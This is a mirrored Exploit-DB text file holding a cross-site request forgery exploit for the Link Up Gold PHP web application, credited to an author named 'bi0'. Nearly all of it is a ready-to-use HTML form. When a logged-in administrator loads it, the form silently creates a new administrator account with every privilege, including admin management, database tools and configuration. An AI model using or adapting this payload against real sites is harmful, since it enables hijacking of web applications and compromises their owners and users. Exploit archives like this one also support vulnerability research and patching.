bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10436.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

76 lines
No EOL
3.1 KiB
Text
Raw Blame History

______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] Link Up Gold - [ CSRF ] Create Administrator Account
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# [ Login ]
# http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<html>
<body>
<form action="http://[server]/[path]/administration/administrators.php" method="POST">
<input type="hidden" name="action" value="admin_created">
<!-- chose username -->
<input name="username" value="admintest" maxlength=15
<!-- chose password -->
<input name="password" value="admintest" maxlength=15>
<!-- chose email -->
<input name="email" value="admintest@lol.com" maxlength="255">
<!-- chose name -->
<input name="name" value="admintest" maxlength="255">
<input type="hidden" name="rights[]" value="links" CHECKED>
<input type="hidden" name="rights[]" value="all_links" CHECKED>
<input type="hidden" name="rights[]" value="categories_links" CHECKED>
<input type="hidden" name="rights[]" value="articles" CHECKED>
<input type="hidden" name="rights[]" value="all_articles" CHECKED>
<input type="hidden" name="rights[]" value="categories_articles" CHECKED>
<input type="hidden" name="rights[]" value="email_owners" CHECKED>
<input type="hidden" name="rights[]" value="blacklist" CHECKED>
<input type="hidden" name="rights[]" value="polls" CHECKED>
<input type="hidden" name="rights[]" value="users" CHECKED>
<input type="hidden" name="rights[]" value="email_users" CHECKED>
<input type="hidden" name="rights[]" value="newsletter" CHECKED>
<input type="hidden" name="rights[]" value="board" CHECKED>
<input type="hidden" name="rights[]" value="search_log" CHECKED>
<input type="hidden" name="rights[]" value="ads" CHECKED>
<input type="hidden" name="rights[]" value="adlinks" CHECKED>
<input type="hidden" name="rights[]" value="news" CHECKED>
<input type="hidden" name="rights[]" value="messages" CHECKED>
<input type="hidden" name="rights[]" value="templates" CHECKED>
<input type="hidden" name="rights[]" value="adv_prices_orders" CHECKED>
<input type="hidden" name="rights[]" value="admins" CHECKED>
<input type="hidden" name="rights[]" value="database_tools" CHECKED>
<input type="hidden" name="rights[]" value="configuration"CHECKED>
<input type="hidden" name="rights[]" value="reset_rebuild" CHECKED>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]
#EOF
Reference in a new issue View git blame Copy permalink